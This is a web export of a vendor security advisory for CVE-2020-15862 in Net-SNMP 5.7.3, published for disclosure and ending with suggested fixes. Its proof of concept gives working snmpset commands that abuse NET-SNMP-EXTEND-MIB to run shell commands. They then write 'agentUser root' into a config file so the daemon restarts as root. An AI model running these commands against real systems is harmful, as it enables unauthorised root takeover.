{"id":16709,"date":"2021-07-08T13:33:43","date_gmt":"2021-07-08T11:33:43","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2020-0059\/"},"modified":"2021-07-19T14:17:16","modified_gmt":"2021-07-19T12:17:16","slug":"usd-2020-0059","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2020-0059\/","title":{"rendered":"usd-2020-0059"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2020-0059 | Net-SNMP v5.7.3<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2020-0059<\/span>
CVE Number<\/strong>: CVE-2020-15862<\/span>
Affected Product<\/strong>: Net-SNMP<\/span>
Affected Version<\/strong>: 5.7.3<\/span>
Vulnerability Type<\/strong>: Elevation of Privileges<\/span>
Security Risk<\/strong>: High<\/span>
Vendor URL<\/strong>: http:\/\/www.net-snmp.org\/<\/a><\/span>
Vendor Status<\/strong>: Fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

The Simple Network Management Protocol (SNMP) is a widely used network protocol for controlling and monitoring network devices. Since the corresponding service (SNMP daemon) needs access to a lot of system components and (per default) binds the network port 161, it usually runs as the root user. On Debian based systems, the default installation of SNMP sets up a dedicated low privileged user account (Debian-snmp), that is used to run the SNMP daemon. This adds an additional layer of security, as a compromise of the SNMP service does not directly allow root access to the targeted device.<\/span><\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

After installing the SNMP daemon on a Debian based system (e.g. <\/span>apt install snmpd<\/code>), a new user account(Debian-snmp) is created by the installer:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]root:x:0:0:root:\/root:\/bin\/bash
\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin
\n[..SNIP..]
\nDebian-snmp:x:122:127::\/var\/lib\/snmp:\/bin\/false<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

The configuration of the snmpd daemon (systemd) shows, that this is the user account that runs the service:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]ubuntu@ubuntu:~$ cat \/lib\/systemd\/system\/snmpd.service
\n[Unit]
\nDescription=Simple Network Management Protocol (SNMP) Daemon.
\nAfter=network.target
\nConditionPathExists=\/etc\/snmp\/snmpd.conf<\/p>\n

[Service]
\nEnvironment=\"MIBSDIR=\/usr\/share\/snmp\/mibs:\/usr\/share\/snmp\/mibs\/iana:\/usr\/share\/snmp\/mibs\/ietf:\/usr\/share\/mibs\/site:\/usr\/share\/snmp\/mibs:\/usr\/share\/mibs\/iana:\/usr\/share\/mibs\/ietf:\/usr\/share\/mibs\/netsnmp\"
\nEnvironment=\"MIBS=\"
\nType=simple
\nExecStartPre=\/bin\/mkdir -p \/var\/run\/agentx
\nExecStart=\/usr\/sbin\/snmpd -Lsd -Lf \/dev\/null -u Debian-snmp -g Debian-snmp -I -smux,mteTrigger,mteTriggerConf -f
\nExecReload=\/bin\/kill -HUP $MAINPID<\/p>\n

[Install]
\nWantedBy=multi-user.target<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

\n

In the following it is assumed that an attacker has read-write<\/strong> access to the SNMP service and is able to use the NET-SNMP-EXTEND-MIB<\/code>extension. The following snipped shows how an attacker can abuse the read-write<\/strong> access to execute the operating system command id<\/code>on the remote SNMP server:<\/p>\n<\/div>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]ubuntu@ubuntu:~$ cat setup.sh
\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c secret localhost \\
\n 'nsExtendStatus.\"example\"' = createAndGo \\
\n 'nsExtendCommand.\"example\"' = \/bin\/bash \\
\n 'nsExtendArgs.\"example\"' = '-c id'
\nubuntu@ubuntu:~$ bash setup.sh
\nNET-SNMP-EXTEND-MIB::nsExtendStatus.\"example\" = INTEGER: createAndGo(4)
\nNET-SNMP-EXTEND-MIB::nsExtendCommand.\"example\" = STRING: \/bin\/bash
\nNET-SNMP-EXTEND-MIB::nsExtendArgs.\"example\" = STRING: -c id
\nubuntu@ubuntu:~$ snmpwalk -v2c -c secret localhost NET-SNMP-EXTEND-MIB::nsExtendObjects | grep example
\nNET-SNMP-EXTEND-MIB::nsExtendCommand.\"example\" = STRING: \/bin\/bash
\nNET-SNMP-EXTEND-MIB::nsExtendArgs.\"example\" = STRING: -c id
\nNET-SNMP-EXTEND-MIB::nsExtendInput.\"example\" = STRING:
\nNET-SNMP-EXTEND-MIB::nsExtendCacheTime.\"example\" = INTEGER: 5
\nNET-SNMP-EXTEND-MIB::nsExtendExecType.\"example\" = INTEGER: exec(1)
\nNET-SNMP-EXTEND-MIB::nsExtendRunType.\"example\" = INTEGER: run-on-read(1)
\nNET-SNMP-EXTEND-MIB::nsExtendStorage.\"example\" = INTEGER: volatile(2)
\nNET-SNMP-EXTEND-MIB::nsExtendStatus.\"example\" = INTEGER: active(1)
\nNET-SNMP-EXTEND-MIB::nsExtendOutput1Line.\"example\" = STRING: uid=122(Debian-snmp) gid=127(Debian-snmp) groups=127(Debian-snmp)
\nNET-SNMP-EXTEND-MIB::nsExtendOutputFull.\"example\" = STRING: uid=122(Debian-snmp) gid=127(Debian-snmp) groups=127(Debian-snmp)
\nNET-SNMP-EXTEND-MIB::nsExtendOutNumLines.\"example\" = INTEGER: 1
\nNET-SNMP-EXTEND-MIB::nsExtendResult.\"example\" = INTEGER: 0
\nNET-SNMP-EXTEND-MIB::nsExtendOutLine.\"example\".1 = STRING: uid=122(Debian-snmp) gid=127(Debian-snmp) groups=127(Debian-snmp)<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

\n
\n

As one can see, the command is executed as the Debian-snmp user and the attacker does not gain root access directly. However, during startup the snmpd daemon loads configuration files from different locations of the file system. One of them is the folder \/var\/lib\/snmp\/<\/code>, which is the home directory of the Debian-snmp user. Since Debian-snmp has write access to the corresponding directory, it is possible for this user to write a new configuration file. The following snipped demonstrates, how an attacker can write a new configuration file by using read-write<\/b> access to the snmp service. The newly created configuration just contains the option agentUser root<\/code>.<\/p>\n<\/div>\n

\n

After the snmpd daemon was restarted, it no longer runs as the low privileged user account, but instead as the root user:<\/p>\n<\/div>\n<\/div>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]ubuntu@ubuntu:~$ cat priv.sh
\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c secret localhost \\
\n 'nsExtendStatus.\"priv\"' = createAndGo \\
\n 'nsExtendCommand.\"priv\"' = \/bin\/bash \\
\n 'nsExtendArgs.\"priv\"' = '-c \"echo agentUser root > \/var\/lib\/snmp\/snmpd.local.conf\"'
\nubuntu@ubuntu:~$ bash priv.sh
\nNET-SNMP-EXTEND-MIB::nsExtendStatus.\"priv\" = INTEGER: createAndGo(4)
\nNET-SNMP-EXTEND-MIB::nsExtendCommand.\"priv\" = STRING: \/bin\/bash
\nNET-SNMP-EXTEND-MIB::nsExtendArgs.\"priv\" = STRING: -c \\\"echo agentUser root > \/var\/lib\/snmp\/snmpd.local.conf\\\"
\nubuntu@ubuntu:~$ snmpwalk -v2c -c secret localhost NET-SNMP-EXTEND-MIB::nsExtendObjects | grep priv
\nNET-SNMP-EXTEND-MIB::nsExtendCommand.\"priv\" = STRING: \/bin\/bash
\nNET-SNMP-EXTEND-MIB::nsExtendArgs.\"priv\" = STRING: -c \\\"echo agentUser root > \/var\/lib\/snmp\/snmpd.local.conf\\\"
\nNET-SNMP-EXTEND-MIB::nsExtendInput.\"priv\" = STRING:
\nNET-SNMP-EXTEND-MIB::nsExtendCacheTime.\"priv\" = INTEGER: 5
\nNET-SNMP-EXTEND-MIB::nsExtendExecType.\"priv\" = INTEGER: exec(1)
\nNET-SNMP-EXTEND-MIB::nsExtendRunType.\"priv\" = INTEGER: run-on-read(1)
\nNET-SNMP-EXTEND-MIB::nsExtendStorage.\"priv\" = INTEGER: volatile(2)
\nNET-SNMP-EXTEND-MIB::nsExtendStatus.\"priv\" = INTEGER: active(1)
\nNET-SNMP-EXTEND-MIB::nsExtendOutput1Line.\"priv\" = STRING:
\nNET-SNMP-EXTEND-MIB::nsExtendOutputFull.\"priv\" = STRING:
\nNET-SNMP-EXTEND-MIB::nsExtendOutNumLines.\"priv\" = INTEGER: 1
\nNET-SNMP-EXTEND-MIB::nsExtendResult.\"priv\" = INTEGER: 0
\nNET-SNMP-EXTEND-MIB::nsExtendOutLine.\"priv\".1 = STRING<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]ubuntu@ubuntu:~$ cat setup.sh
\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c secret localhost \\
\n 'nsExtendStatus.\"example\"' = createAndGo \\
\n 'nsExtendCommand.\"example\"' = \/bin\/bash \\
\n 'nsExtendArgs.\"example\"' = '-c id'
\nubuntu@ubuntu:~$ bash setup.sh
\nNET-SNMP-EXTEND-MIB::nsExtendStatus.\"example\" = INTEGER: createAndGo(4)
\nNET-SNMP-EXTEND-MIB::nsExtendCommand.\"example\" = STRING: \/bin\/bash
\nNET-SNMP-EXTEND-MIB::nsExtendArgs.\"example\" = STRING: -c id
\nubuntu@ubuntu:~$ snmpwalk -v2c -c secret localhost NET-SNMP-EXTEND-MIB::nsExtendObjects | grep example
\nNET-SNMP-EXTEND-MIB::nsExtendCommand.\"example\" = STRING: \/bin\/bash
\nNET-SNMP-EXTEND-MIB::nsExtendArgs.\"example\" = STRING: -c id
\nNET-SNMP-EXTEND-MIB::nsExtendInput.\"example\" = STRING:
\nNET-SNMP-EXTEND-MIB::nsExtendCacheTime.\"example\" = INTEGER: 5
\nNET-SNMP-EXTEND-MIB::nsExtendExecType.\"example\" = INTEGER: exec(1)
\nNET-SNMP-EXTEND-MIB::nsExtendRunType.\"example\" = INTEGER: run-on-read(1)
\nNET-SNMP-EXTEND-MIB::nsExtendStorage.\"example\" = INTEGER: volatile(2)
\nNET-SNMP-EXTEND-MIB::nsExtendStatus.\"example\" = INTEGER: active(1)
\nNET-SNMP-EXTEND-MIB::nsExtendOutput1Line.\"example\" = STRING: uid=0(root) gid=127(Debian-snmp) groups=127(Debian-snmp)
\nNET-SNMP-EXTEND-MIB::nsExtendOutputFull.\"example\" = STRING: uid=0(root) gid=127(Debian-snmp) groups=127(Debian-snmp)
\nNET-SNMP-EXTEND-MIB::nsExtendOutNumLines.\"example\" = INTEGER: 1
\nNET-SNMP-EXTEND-MIB::nsExtendResult.\"example\" = INTEGER: 0
\nNET-SNMP-EXTEND-MIB::nsExtendOutLine.\"example\".1 = STRING: uid=0(root) gid=127(Debian-snmp) groups=127(Debian-snmp)<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\"]<\/p>\n

This way, the attacker can execute commands as the root user. This bypasses the intended account separation and allows every user with read-write<\/b> access to the SNMP service (including the Debian-snmp user itself) to escalate privileges to root.<\/p>\n

The attack described above requires a restart of the SNMP service. However, it should be noticed that this can often be enforced by the attacker. For example, the attacker can use command execution as Debian-snmp to kill the running snmpd instance. If the service is configured to restart automatically, this is sufficient to gain root access.<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Fix<\/h3>\n

There are different possibilities to fix this issue.<\/p>\n

    \n
  1. The NET-SNMP service could ignore the configuration files inside \/var\/lib\/snmp<\/code> or restrict possible options that can be configured by these files.<\/li>\n
  2. The installer of NET-SNMP could create the configuration files inside \/var\/lib\/snmp<\/code> automatically and set these files read-only.<\/li>\n
  3. The systemd service sets the SNMP user on the command line. This option could also be favored instead of the configuration file. However, one of the previous two suggestions should be preferred.<\/li>\n<\/ol>\n

    <\/h3>\n

    Timeline<\/h3>\n